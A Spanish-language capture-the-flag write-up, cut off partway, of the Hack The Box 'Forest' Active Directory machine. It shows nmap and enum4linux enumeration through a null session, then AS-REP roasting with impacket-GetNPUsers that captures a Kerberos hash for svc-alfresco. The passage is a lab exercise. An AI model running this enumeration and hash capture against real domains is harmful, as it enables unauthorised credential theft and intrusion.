Forest [EASY🟢]

Dificultad: Fácil

1- Reconocimiento y escaneo

`1.1 Ping`

┌──(root㉿kali)-[/home/t0mz]
└─# ping -c 1 10.10.10.161
PING 10.10.10.161 (10.10.10.161) 56(84) bytes of data.
64 bytes from 10.10.10.161: icmp_seq=1 ttl=127 time=168 ms

--- 10.10.10.161 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 167.959/167.959/167.959/0.000 ms

Podemos notar que se trata de una maquina Windows, debido al TTL:

TTL <= 64 >>(Linux)
TTL <= 128 >> (Windows)

`1.2 Nmap`

───────┬─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
       │ File: escaneo.txt
───────┼─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
   1   │ # Nmap 7.95 scan initiated Wed Mar  5 13:47:20 2025 as: /usr/lib/nmap/nmap -sC -sS -sV --min-rate 5000 -p- -open -n 
       │ -Pn -vvv -oN escaneo.txt 10.10.10.161
   2   │ Nmap scan report for 10.10.10.161
   3   │ Host is up, received user-set (0.18s latency).
   4   │ Scanned at 2025-03-05 13:47:20 -03 for 90s
   5   │ Not shown: 65511 closed tcp ports (reset)
   6   │ PORT      STATE SERVICE      REASON          VERSION
   7   │ 53/tcp    open  domain       syn-ack ttl 127 Simple DNS Plus
   8   │ 88/tcp    open  kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2025-03-05 16:54:31Z)
   9   │ 135/tcp   open  msrpc        syn-ack ttl 127 Microsoft Windows RPC
  10   │ 139/tcp   open  netbios-ssn  syn-ack ttl 127 Microsoft Windows netbios-ssn
  11   │ 389/tcp   open  ldap         syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Defau
       │ lt-First-Site-Name)
  12   │ 445/tcp   open  microsoft-ds syn-ack ttl 127 Windows Server 2016 Standard 14393 microsoft-ds (workgroup: HTB)
  13   │ 464/tcp   open  kpasswd5?    syn-ack ttl 127
  14   │ 593/tcp   open  ncacn_http   syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
  15   │ 636/tcp   open  tcpwrapped   syn-ack ttl 127
  16   │ 3268/tcp  open  ldap         syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Defau
       │ lt-First-Site-Name)
  17   │ 3269/tcp  open  tcpwrapped   syn-ack ttl 127
  18   │ 5985/tcp  open  http         syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
  19   │ |_http-title: Not Found
  20   │ |_http-server-header: Microsoft-HTTPAPI/2.0
  21   │ 9389/tcp  open  mc-nmf       syn-ack ttl 127 .NET Message Framing
  22   │ 47001/tcp open  http         syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
  23   │ |_http-server-header: Microsoft-HTTPAPI/2.0
  24   │ |_http-title: Not Found
  25   │ 49664/tcp open  msrpc        syn-ack ttl 127 Microsoft Windows RPC
  26   │ 49665/tcp open  msrpc        syn-ack ttl 127 Microsoft Windows RPC
  27   │ 49666/tcp open  msrpc        syn-ack ttl 127 Microsoft Windows RPC
  28   │ 49667/tcp open  msrpc        syn-ack ttl 127 Microsoft Windows RPC
  29   │ 49671/tcp open  msrpc        syn-ack ttl 127 Microsoft Windows RPC
  30   │ 49676/tcp open  ncacn_http   syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
  31   │ 49677/tcp open  msrpc        syn-ack ttl 127 Microsoft Windows RPC
  32   │ 49684/tcp open  msrpc        syn-ack ttl 127 Microsoft Windows RPC
  33   │ 49706/tcp open  msrpc        syn-ack ttl 127 Microsoft Windows RPC
  34   │ 49957/tcp open  msrpc        syn-ack ttl 127 Microsoft Windows RPC
  35   │ Service Info: Host: FOREST; OS: Windows; CPE: cpe:/o:microsoft:windows
  36   │ 
  37   │ Host script results:
  38   │ | smb-os-discovery: 
  39   │ |   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
  40   │ |   Computer name: FOREST
  41   │ |   NetBIOS computer name: FOREST\x00
  42   │ |   Domain name: htb.local
  43   │ |   Forest name: htb.local
  44   │ |   FQDN: FOREST.htb.local
  45   │ |_  System time: 2025-03-05T08:55:25-08:00
  46   │ | smb-security-mode: 
  47   │ |   account_used: guest
  48   │ |   authentication_level: user
  49   │ |   challenge_response: supported
  50   │ |_  message_signing: required
  51   │ | smb2-time: 
  52   │ |   date: 2025-03-05T16:55:26
  53   │ |_  start_date: 2025-03-05T15:39:25
  54   │ |_clock-skew: mean: 2h46m49s, deviation: 4h37m09s, median: 6m48s
  55   │ | smb2-security-mode: 
  56   │ |   3:1:1: 
  57   │ |_    Message signing enabled and required
  58   │ | p2p-conficker: 
  59   │ |   Checking for Conficker.C or higher...
  60   │ |   Check 1 (port 32753/tcp): CLEAN (Couldn't connect)
  61   │ |   Check 2 (port 57334/tcp): CLEAN (Couldn't connect)
  62   │ |   Check 3 (port 44587/udp): CLEAN (Failed to receive data)
  63   │ |   Check 4 (port 10445/udp): CLEAN (Timeout)
  64   │ |_  0/4 checks are positive: Host is CLEAN or ports are blocked
  65   │ 
  66   │ Read data files from: /usr/share/nmap
  67   │ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
  68   │ # Nmap done at Wed Mar  5 13:48:51 2025 -- 1 IP address (1 host up) scanned in 90.37 seconds
───────┴─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────

Podemos ver que estamos frente a un entorno de directorio activo de Windows, concretamente Windows Server 2016 Standard compilación 14393, tenemos los puertos comunes de directorio activo como el 88(Kerberos), 135, 139, 389(LDAP) y 445(SMB)

`1.3 enum4linux`

enum4linux 10.10.10.161

┌──(root㉿kali)-[/home/t0mz/ctf/forest]
└─# enum4linux 10.10.10.161        
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Thu Mar  6 12:24:46 2025

 =========================================( Target Information )=========================================

Target ........... 10.10.10.161
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


 ============================( Enumerating Workgroup/Domain on 10.10.10.161 )============================


[E] Can't find workgroup/domain



 ================================( Nbtstat Information for 10.10.10.161 )================================

Looking up status of 10.10.10.161
No reply from 10.10.10.161

 ===================================( Session Check on 10.10.10.161 )===================================


[+] Server 10.10.10.161 allows sessions using username '', password ''


 ================================( Getting domain SID for 10.10.10.161 )================================

Domain Name: HTB
Domain Sid: S-1-5-21-3072663084-364016917-1341370565

[+] Host is part of a domain (not a workgroup)


 ===================================( OS information on 10.10.10.161 )===================================


[E] Can't get OS info with smbclient


[+] Got OS info for 10.10.10.161 from srvinfo: 
do_cmd: Could not initialise srvsvc. Error was NT_STATUS_ACCESS_DENIED


 =======================================( Users on 10.10.10.161 )=======================================

index: 0x2137 RID: 0x463 acb: 0x00020015 Account: $331000-VK4ADACQNUCA	Name: (null)	Desc: (null)
index: 0xfbc RID: 0x1f4 acb: 0x00000010 Account: Administrator	Name: Administrator	Desc: Built-in account for administering the computer/domain
index: 0x2369 RID: 0x47e acb: 0x00000210 Account: andy	Name: Andy Hislip	Desc: (null)
index: 0xfbe RID: 0x1f7 acb: 0x00000215 Account: DefaultAccount	Name: (null)	Desc: A user account managed by the system.
index: 0xfbd RID: 0x1f5 acb: 0x00000215 Account: Guest	Name: (null)	Desc: Built-in account for guest access to the computer/domain
index: 0x2352 RID: 0x478 acb: 0x00000210 Account: HealthMailbox0659cc1	Name: HealthMailbox-EXCH01-010	Desc: (null)
index: 0x234b RID: 0x471 acb: 0x00000210 Account: HealthMailbox670628e	Name: HealthMailbox-EXCH01-003	Desc: (null)
index: 0x234d RID: 0x473 acb: 0x00000210 Account: HealthMailbox6ded678	Name: HealthMailbox-EXCH01-005	Desc: (null)
index: 0x2351 RID: 0x477 acb: 0x00000210 Account: HealthMailbox7108a4e	Name: HealthMailbox-EXCH01-009	Desc: (null)
index: 0x234e RID: 0x474 acb: 0x00000210 Account: HealthMailbox83d6781	Name: HealthMailbox-EXCH01-006	Desc: (null)
index: 0x234c RID: 0x472 acb: 0x00000210 Account: HealthMailbox968e74d	Name: HealthMailbox-EXCH01-004	Desc: (null)
index: 0x2350 RID: 0x476 acb: 0x00000210 Account: HealthMailboxb01ac64	Name: HealthMailbox-EXCH01-008	Desc: (null)
index: 0x234a RID: 0x470 acb: 0x00000210 Account: HealthMailboxc0a90c9	Name: HealthMailbox-EXCH01-002	Desc: (null)
index: 0x2348 RID: 0x46e acb: 0x00000210 Account: HealthMailboxc3d7722	Name: HealthMailbox-EXCH01-Mailbox-Database-1118319013	Desc: (null)
index: 0x2349 RID: 0x46f acb: 0x00000210 Account: HealthMailboxfc9daad	Name: HealthMailbox-EXCH01-001	Desc: (null)
index: 0x234f RID: 0x475 acb: 0x00000210 Account: HealthMailboxfd87238	Name: HealthMailbox-EXCH01-007	Desc: (null)
index: 0xff4 RID: 0x1f6 acb: 0x00000011 Account: krbtgt	Name: (null)	Desc: Key Distribution Center Service Account
index: 0x2360 RID: 0x47a acb: 0x00000210 Account: lucinda	Name: Lucinda Berger	Desc: (null)
index: 0x236a RID: 0x47f acb: 0x00000210 Account: mark	Name: Mark Brandt	Desc: (null)
index: 0x236b RID: 0x480 acb: 0x00000210 Account: santi	Name: Santi Rodriguez	Desc: (null)
index: 0x235c RID: 0x479 acb: 0x00000210 Account: sebastien	Name: Sebastien Caron	Desc: (null)
index: 0x215a RID: 0x468 acb: 0x00020011 Account: SM_1b41c9286325456bb	Name: Microsoft Exchange Migration	Desc: (null)
index: 0x2161 RID: 0x46c acb: 0x00020011 Account: SM_1ffab36a2f5f479cb	Name: SystemMailbox{8cc370d3-822a-4ab8-a926-bb94bd0641a9}	Desc: (null)
index: 0x2156 RID: 0x464 acb: 0x00020011 Account: SM_2c8eef0a09b545acb	Name: Microsoft Exchange Approval Assistant	Desc: (null)
index: 0x2159 RID: 0x467 acb: 0x00020011 Account: SM_681f53d4942840e18	Name: Discovery Search Mailbox	Desc: (null)
index: 0x2158 RID: 0x466 acb: 0x00020011 Account: SM_75a538d3025e4db9a	Name: Microsoft Exchange	Desc: (null)
index: 0x215c RID: 0x46a acb: 0x00020011 Account: SM_7c96b981967141ebb	Name: E4E Encryption Store - Active	Desc: (null)
index: 0x215b RID: 0x469 acb: 0x00020011 Account: SM_9b69f1b9d2cc45549	Name: Microsoft Exchange Federation Mailbox	Desc: (null)
index: 0x215d RID: 0x46b acb: 0x00020011 Account: SM_c75ee099d0a64c91b	Name: Microsoft Exchange	Desc: (null)
index: 0x2157 RID: 0x465 acb: 0x00020011 Account: SM_ca8c2ed5bdab4dc9b	Name: Microsoft Exchange	Desc: (null)
index: 0x2365 RID: 0x47b acb: 0x00010210 Account: svc-alfresco	Name: svc-alfresco	Desc: (null)

user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[DefaultAccount] rid:[0x1f7]
user:[$331000-VK4ADACQNUCA] rid:[0x463]
user:[SM_2c8eef0a09b545acb] rid:[0x464]
user:[SM_ca8c2ed5bdab4dc9b] rid:[0x465]
user:[SM_75a538d3025e4db9a] rid:[0x466]
user:[SM_681f53d4942840e18] rid:[0x467]
user:[SM_1b41c9286325456bb] rid:[0x468]
user:[SM_9b69f1b9d2cc45549] rid:[0x469]
user:[SM_7c96b981967141ebb] rid:[0x46a]
user:[SM_c75ee099d0a64c91b] rid:[0x46b]
user:[SM_1ffab36a2f5f479cb] rid:[0x46c]
user:[HealthMailboxc3d7722] rid:[0x46e]
user:[HealthMailboxfc9daad] rid:[0x46f]
user:[HealthMailboxc0a90c9] rid:[0x470]
user:[HealthMailbox670628e] rid:[0x471]
user:[HealthMailbox968e74d] rid:[0x472]
user:[HealthMailbox6ded678] rid:[0x473]
user:[HealthMailbox83d6781] rid:[0x474]
user:[HealthMailboxfd87238] rid:[0x475]
user:[HealthMailboxb01ac64] rid:[0x476]
user:[HealthMailbox7108a4e] rid:[0x477]
user:[HealthMailbox0659cc1] rid:[0x478]
user:[sebastien] rid:[0x479]
user:[lucinda] rid:[0x47a]
user:[svc-alfresco] rid:[0x47b]
user:[andy] rid:[0x47e]
user:[mark] rid:[0x47f]
user:[santi] rid:[0x480]

 =================================( Share Enumeration on 10.10.10.161 )=================================

do_connect: Connection to 10.10.10.161 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)

	Sharename       Type      Comment
	---------       ----      -------
Reconnecting with SMB1 for workgroup listing.
Unable to connect with SMB1 -- no workgroup available

[+] Attempting to map shares on 10.10.10.161


 ============================( Password Policy Information for 10.10.10.161 )============================



[+] Attaching to 10.10.10.161 using a NULL share

[+] Trying protocol 139/SMB...

	[!] Protocol failed: Cannot request session (Called Name:10.10.10.161)

[+] Trying protocol 445/SMB...

[+] Found domain(s):

	[+] HTB
	[+] Builtin

[+] Password Info for Domain: HTB

	[+] Minimum password length: 7
	[+] Password history length: 24
	[+] Maximum password age: Not Set
	[+] Password Complexity Flags: 000000

		[+] Domain Refuse Password Change: 0
		[+] Domain Password Store Cleartext: 0
		[+] Domain Password Lockout Admins: 0
		[+] Domain Password No Clear Change: 0
		[+] Domain Password No Anon Change: 0
		[+] Domain Password Complex: 0

	[+] Minimum password age: 1 day 4 minutes 
	[+] Reset Account Lockout Counter: 30 minutes 
	[+] Locked Account Duration: 30 minutes 
	[+] Account Lockout Threshold: None
	[+] Forced Log off Time: Not Set



[+] Retieved partial password policy with rpcclient:


Password Complexity: Disabled
Minimum Password Length: 7


 =======================================( Groups on 10.10.10.161 )=======================================


[+] Getting builtin groups:

group:[Account Operators] rid:[0x224]
group:[Pre-Windows 2000 Compatible Access] rid:[0x22a]
group:[Incoming Forest Trust Builders] rid:[0x22d]
group:[Windows Authorization Access Group] rid:[0x230]
group:[Terminal Server License Servers] rid:[0x231]
group:[Administrators] rid:[0x220]
group:[Users] rid:[0x221]
group:[Guests] rid:[0x222]
group:[Print Operators] rid:[0x226]
group:[Backup Operators] rid:[0x227]
group:[Replicator] rid:[0x228]
group:[Remote Desktop Users] rid:[0x22b]
group:[Network Configuration Operators] rid:[0x22c]
group:[Performance Monitor Users] rid:[0x22e]
group:[Performance Log Users] rid:[0x22f]
group:[Distributed COM Users] rid:[0x232]
group:[IIS_IUSRS] rid:[0x238]
group:[Cryptographic Operators] rid:[0x239]
group:[Event Log Readers] rid:[0x23d]
group:[Certificate Service DCOM Access] rid:[0x23e]
group:[RDS Remote Access Servers] rid:[0x23f]
group:[RDS Endpoint Servers] rid:[0x240]
group:[RDS Management Servers] rid:[0x241]
group:[Hyper-V Administrators] rid:[0x242]
group:[Access Control Assistance Operators] rid:[0x243]
group:[Remote Management Users] rid:[0x244]
group:[System Managed Accounts Group] rid:[0x245]
group:[Storage Replica Administrators] rid:[0x246]
group:[Server Operators] rid:[0x225]

[+]  Getting builtin group memberships:

Group: System Managed Accounts Group' (RID: 581) has member: Couldn't lookup SIDs
Group: Users' (RID: 545) has member: Couldn't lookup SIDs
Group: Pre-Windows 2000 Compatible Access' (RID: 554) has member: Couldn't lookup SIDs
Group: Account Operators' (RID: 548) has member: Couldn't lookup SIDs
Group: IIS_IUSRS' (RID: 568) has member: Couldn't lookup SIDs
Group: Administrators' (RID: 544) has member: Couldn't lookup SIDs
Group: Windows Authorization Access Group' (RID: 560) has member: Couldn't lookup SIDs
Group: Remote Management Users' (RID: 580) has member: Couldn't lookup SIDs
Group: Guests' (RID: 546) has member: Couldn't lookup SIDs

[+]  Getting local groups:

group:[Cert Publishers] rid:[0x205]
group:[RAS and IAS Servers] rid:[0x229]
group:[Allowed RODC Password Replication Group] rid:[0x23b]
group:[Denied RODC Password Replication Group] rid:[0x23c]
group:[DnsAdmins] rid:[0x44d]

[+]  Getting local group memberships:

Group: Denied RODC Password Replication Group' (RID: 572) has member: Couldn't lookup SIDs

[+]  Getting domain groups:

group:[Enterprise Read-only Domain Controllers] rid:[0x1f2]
group:[Domain Admins] rid:[0x200]
group:[Domain Users] rid:[0x201]
group:[Domain Guests] rid:[0x202]
group:[Domain Computers] rid:[0x203]
group:[Domain Controllers] rid:[0x204]
group:[Schema Admins] rid:[0x206]
group:[Enterprise Admins] rid:[0x207]
group:[Group Policy Creator Owners] rid:[0x208]
group:[Read-only Domain Controllers] rid:[0x209]
group:[Cloneable Domain Controllers] rid:[0x20a]
group:[Protected Users] rid:[0x20d]
group:[Key Admins] rid:[0x20e]
group:[Enterprise Key Admins] rid:[0x20f]
group:[DnsUpdateProxy] rid:[0x44e]
group:[Organization Management] rid:[0x450]
group:[Recipient Management] rid:[0x451]
group:[View-Only Organization Management] rid:[0x452]
group:[Public Folder Management] rid:[0x453]
group:[UM Management] rid:[0x454]
group:[Help Desk] rid:[0x455]
group:[Records Management] rid:[0x456]
group:[Discovery Management] rid:[0x457]
group:[Server Management] rid:[0x458]
group:[Delegated Setup] rid:[0x459]
group:[Hygiene Management] rid:[0x45a]
group:[Compliance Management] rid:[0x45b]
group:[Security Reader] rid:[0x45c]
group:[Security Administrator] rid:[0x45d]
group:[Exchange Servers] rid:[0x45e]
group:[Exchange Trusted Subsystem] rid:[0x45f]
group:[Managed Availability Servers] rid:[0x460]
group:[Exchange Windows Permissions] rid:[0x461]
group:[ExchangeLegacyInterop] rid:[0x462]
group:[$D31000-NSEL5BRJ63V7] rid:[0x46d]
group:[Service Accounts] rid:[0x47c]
group:[Privileged IT Accounts] rid:[0x47d]
group:[test] rid:[0x13ed]

[+]  Getting domain group memberships:

Group: 'Organization Management' (RID: 1104) has member: HTB\Administrator
Group: '$D31000-NSEL5BRJ63V7' (RID: 1133) has member: HTB\EXCH01$
Group: 'Privileged IT Accounts' (RID: 1149) has member: HTB\Service Accounts
Group: 'Exchange Trusted Subsystem' (RID: 1119) has member: HTB\EXCH01$
Group: 'Domain Controllers' (RID: 516) has member: HTB\FOREST$
Group: 'Domain Computers' (RID: 515) has member: HTB\EXCH01$
Group: 'Managed Availability Servers' (RID: 1120) has member: HTB\EXCH01$
Group: 'Managed Availability Servers' (RID: 1120) has member: HTB\Exchange Servers
Group: 'Enterprise Admins' (RID: 519) has member: HTB\Administrator
Group: 'Schema Admins' (RID: 518) has member: HTB\Administrator
Group: 'Domain Users' (RID: 513) has member: HTB\Administrator
Group: 'Domain Users' (RID: 513) has member: HTB\DefaultAccount
Group: 'Domain Users' (RID: 513) has member: HTB\krbtgt
Group: 'Domain Users' (RID: 513) has member: HTB\$331000-VK4ADACQNUCA
Group: 'Domain Users' (RID: 513) has member: HTB\SM_2c8eef0a09b545acb
Group: 'Domain Users' (RID: 513) has member: HTB\SM_ca8c2ed5bdab4dc9b
Group: 'Domain Users' (RID: 513) has member: HTB\SM_75a538d3025e4db9a
Group: 'Domain Users' (RID: 513) has member: HTB\SM_681f53d4942840e18
Group: 'Domain Users' (RID: 513) has member: HTB\SM_1b41c9286325456bb
Group: 'Domain Users' (RID: 513) has member: HTB\SM_9b69f1b9d2cc45549
Group: 'Domain Users' (RID: 513) has member: HTB\SM_7c96b981967141ebb
Group: 'Domain Users' (RID: 513) has member: HTB\SM_c75ee099d0a64c91b
Group: 'Domain Users' (RID: 513) has member: HTB\SM_1ffab36a2f5f479cb
Group: 'Domain Users' (RID: 513) has member: HTB\HealthMailboxc3d7722
Group: 'Domain Users' (RID: 513) has member: HTB\HealthMailboxfc9daad
Group: 'Domain Users' (RID: 513) has member: HTB\HealthMailboxc0a90c9
Group: 'Domain Users' (RID: 513) has member: HTB\HealthMailbox670628e
Group: 'Domain Users' (RID: 513) has member: HTB\HealthMailbox968e74d
Group: 'Domain Users' (RID: 513) has member: HTB\HealthMailbox6ded678
Group: 'Domain Users' (RID: 513) has member: HTB\HealthMailbox83d6781
Group: 'Domain Users' (RID: 513) has member: HTB\HealthMailboxfd87238
Group: 'Domain Users' (RID: 513) has member: HTB\HealthMailboxb01ac64
Group: 'Domain Users' (RID: 513) has member: HTB\HealthMailbox7108a4e
Group: 'Domain Users' (RID: 513) has member: HTB\HealthMailbox0659cc1
Group: 'Domain Users' (RID: 513) has member: HTB\sebastien
Group: 'Domain Users' (RID: 513) has member: HTB\lucinda
Group: 'Domain Users' (RID: 513) has member: HTB\svc-alfresco
Group: 'Domain Users' (RID: 513) has member: HTB\andy
Group: 'Domain Users' (RID: 513) has member: HTB\mark
Group: 'Domain Users' (RID: 513) has member: HTB\santi
Group: 'Group Policy Creator Owners' (RID: 520) has member: HTB\Administrator
Group: 'Domain Admins' (RID: 512) has member: HTB\Administrator
Group: 'Exchange Servers' (RID: 1118) has member: HTB\EXCH01$
Group: 'Exchange Servers' (RID: 1118) has member: HTB\$D31000-NSEL5BRJ63V7
Group: 'Domain Guests' (RID: 514) has member: HTB\Guest
Group: 'Service Accounts' (RID: 1148) has member: HTB\svc-alfresco
Group: 'Exchange Windows Permissions' (RID: 1121) has member: HTB\Exchange Trusted Subsystem

 ==================( Users on 10.10.10.161 via RID cycling (RIDS: 500-550,1000-1050) )==================


[E] Couldn't get SID: NT_STATUS_ACCESS_DENIED.  RID cycling not possible.


 ===============================( Getting printer info for 10.10.10.161 )===============================

do_cmd: Could not initialise spoolss. Error was NT_STATUS_ACCESS_DENIED


enum4linux complete on Thu Mar  6 12:30:35 2025

                                                                                                                             
┌──(root㉿kali)-[/home/t0mz/ctf/forest]
└─#

2- Explotación

`2.1 Enumeración de usuarios`

Nos da mucha información la herramienta enum4linux, vemos una lista de usuarios dentro del escaneo:

user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[DefaultAccount] rid:[0x1f7]
user:[$331000-VK4ADACQNUCA] rid:[0x463]
user:[SM_2c8eef0a09b545acb] rid:[0x464]
user:[SM_ca8c2ed5bdab4dc9b] rid:[0x465]
user:[SM_75a538d3025e4db9a] rid:[0x466]
user:[SM_681f53d4942840e18] rid:[0x467]
user:[SM_1b41c9286325456bb] rid:[0x468]
user:[SM_9b69f1b9d2cc45549] rid:[0x469]
user:[SM_7c96b981967141ebb] rid:[0x46a]
user:[SM_c75ee099d0a64c91b] rid:[0x46b]
user:[SM_1ffab36a2f5f479cb] rid:[0x46c]
user:[HealthMailboxc3d7722] rid:[0x46e]
user:[HealthMailboxfc9daad] rid:[0x46f]
user:[HealthMailboxc0a90c9] rid:[0x470]
user:[HealthMailbox670628e] rid:[0x471]
user:[HealthMailbox968e74d] rid:[0x472]
user:[HealthMailbox6ded678] rid:[0x473]
user:[HealthMailbox83d6781] rid:[0x474]
user:[HealthMailboxfd87238] rid:[0x475]
user:[HealthMailboxb01ac64] rid:[0x476]
user:[HealthMailbox7108a4e] rid:[0x477]
user:[HealthMailbox0659cc1] rid:[0x478]
user:[sebastien] rid:[0x479]
user:[lucinda] rid:[0x47a]
user:[svc-alfresco] rid:[0x47b]
user:[andy] rid:[0x47e]
user:[mark] rid:[0x47f]
user:[santi] rid:[0x480]

Almacenamos esta lista de usuarios en un archivo llamado users.txt:

┌──(root㉿kali)-[/home/t0mz/ctf/forest]
└─# nvim users                                                                         
                                                                                                                                        
┌──(root㉿kali)-[/home/t0mz/ctf/forest]
└─# cat users    
───────┬────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
       │ File: users
───────┼────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
   1   │ user:[Administrator] rid:[0x1f4]
   2   │ user:[Guest] rid:[0x1f5]
   3   │ user:[krbtgt] rid:[0x1f6]
   4   │ user:[DefaultAccount] rid:[0x1f7]
   5   │ user:[$331000-VK4ADACQNUCA] rid:[0x463]
   6   │ user:[SM_2c8eef0a09b545acb] rid:[0x464]
   7   │ user:[SM_ca8c2ed5bdab4dc9b] rid:[0x465]
   8   │ user:[SM_75a538d3025e4db9a] rid:[0x466]
   9   │ user:[SM_681f53d4942840e18] rid:[0x467]
  10   │ user:[SM_1b41c9286325456bb] rid:[0x468]
  11   │ user:[SM_9b69f1b9d2cc45549] rid:[0x469]
  12   │ user:[SM_7c96b981967141ebb] rid:[0x46a]
  13   │ user:[SM_c75ee099d0a64c91b] rid:[0x46b]
  14   │ user:[SM_1ffab36a2f5f479cb] rid:[0x46c]
  15   │ user:[HealthMailboxc3d7722] rid:[0x46e]
  16   │ user:[HealthMailboxfc9daad] rid:[0x46f]
  17   │ user:[HealthMailboxc0a90c9] rid:[0x470]
  18   │ user:[HealthMailbox670628e] rid:[0x471]
  19   │ user:[HealthMailbox968e74d] rid:[0x472]
  20   │ user:[HealthMailbox6ded678] rid:[0x473]
  21   │ user:[HealthMailbox83d6781] rid:[0x474]
  22   │ user:[HealthMailboxfd87238] rid:[0x475]
  23   │ user:[HealthMailboxb01ac64] rid:[0x476]
  24   │ user:[HealthMailbox7108a4e] rid:[0x477]
  25   │ user:[HealthMailbox0659cc1] rid:[0x478]
  26   │ user:[sebastien] rid:[0x479]
  27   │ user:[lucinda] rid:[0x47a]
  28   │ user:[svc-alfresco] rid:[0x47b]
  29   │ user:[andy] rid:[0x47e]
  30   │ user:[mark] rid:[0x47f]
  31   │ user:[santi] rid:[0x480]
───────┴────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
                                                                                                                                        
┌──(root㉿kali)-[/home/t0mz/ctf/forest]
└─#

Vamos a utilizar expresiones regulares y filtros para obtener los usuarios limpios

cat users.txt | tr ':' ' ' | awk {'print $2'} | grep -v 'Mail' | grep -v 'SM' | grep -v '$33' | tr '[]' ' ' | tr -d ' ' > users.txt

┌──(root㉿kali)-[/home/t0mz/ctf/forest]
└─# cat users.txt | tr ':' ' ' | awk {'print $2'} | grep -v 'Mail' | grep -v 'SM' | grep -v '$33' | tr '[]' ' ' | tr -d ' ' > users.txt
                                                                                                                                        
┌──(root㉿kali)-[/home/t0mz/ctf/forest]
└─# cat users.txt                                                                                                                      
───────┬────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
       │ File: users.txt
───────┼────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
   1   │ Administrator
   2   │ Guest
   3   │ krbtgt
   4   │ DefaultAccount
   5   │ sebastien
   6   │ lucinda
   7   │ svc-alfresco
   8   │ andy
   9   │ mark
  10   │ santi
───────┴────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
                                                                                                                                        
┌──(root㉿kali)-[/home/t0mz/ctf/forest]
└─#

`2.2 impacket-GetNPUsers`

Una vez obtenido los usuarios, vamos a obtener los hashes de los usuarios y mediante Kerberos obtener los hashes, mediante la obtención de los tickets

Para eso, utilizaremos la herramienta "impacket-GetNPUsers", con el siguiente comando:

impacket-GetNPUsers htb.local/ -no-pass -usersfile users.txt -dc-ip 10.10.10.161

A este comando primero le especificamos el dominio, que si recordamos, Nmap, nos había arrojado el dominio "htb.local/" que se aloja en el puerto 53, luego le especificamos que no tenemos la contraseña, luego el archivo donde almacenamos los usuarios del entorno de directorio activo, y por ultimo le especificamos la IP de la maquina

Ejecutamos:

┌──(root㉿kali)-[/home/t0mz/ctf/forest]
└─# impacket-GetNPUsers htb.local/ -no-pass -usersfile users.txt -dc-ip 10.10.10.161
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 
[-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] User sebastien doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User lucinda doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$23$svc-alfresco@HTB.LOCAL:650fb4079f5387180c20c639a22aea29$39ca0c3cb5144bf7781a8aa2e72599a9770f7854f10422dd0e6a0497888034d004ece47c977f9b900dc5760b92d2d8500d4d77dc2e01744fd72b242e2dd7298c0cccb0dfd145b0dcecb1d99f690977c94fc2a25ebcae6e156a80d84b53da0b2d23c3e0c8879debe6bac3ef78b8ea81ea469aa3a770a1785c19a8972aa94e504c5e64fa0faf4e52294d1b46850287276019728c31acd9d4e9dde0bff4abb9c4825e9ccadfc7092134dd80168e650a4e8a921633da8cdd84f76bfffce20ee52019f94ceea61b590b65dc02cee2062327273c6198b5dd38c858fcd928180fe7eb025c9c1da11982
[-] User andy doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User mark doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User santi doesn't have UF_DONT_REQUIRE_PREAUTH set

Kerberos nos devolvio el ticket del usuario "svc-alfresco"

Vamos a almacenarlo en un archivo de texto:

┌──(root㉿kali)-[/home/t0mz/ctf/forest]
└─# nvim svc-alfresco.txt
                                                                                                                                        
┌──(root㉿kali)-[/home/t0mz/ctf/forest]
└─# cat svc-alfresco.txt 
───────┬────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
       │ File: svc-alfresco.txt
───────┼────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
   1   │ $krb5asrep$23$svc-alfresco@HTB.LOCAL:650fb4079f5387180c20c639a22aea29$39ca0c3cb5144bf7781a8aa2e72599a9770f7854f10422dd0e6a04978
       │ 88034d004ece47c977f9b900dc5760b92d2d8500d4d77dc2e01744fd72b242e2dd7298c0cccb0dfd145b0dcecb1d99f690977c94fc2a25ebcae6e156a80d84b
       │ 53da0b2d23c3e0c8879debe6bac3ef78b8ea81ea469aa3a770a1785c19a8972aa94e504c5e64fa0faf4e52294d1b46850287276019728c31acd9d4e9dde0bff
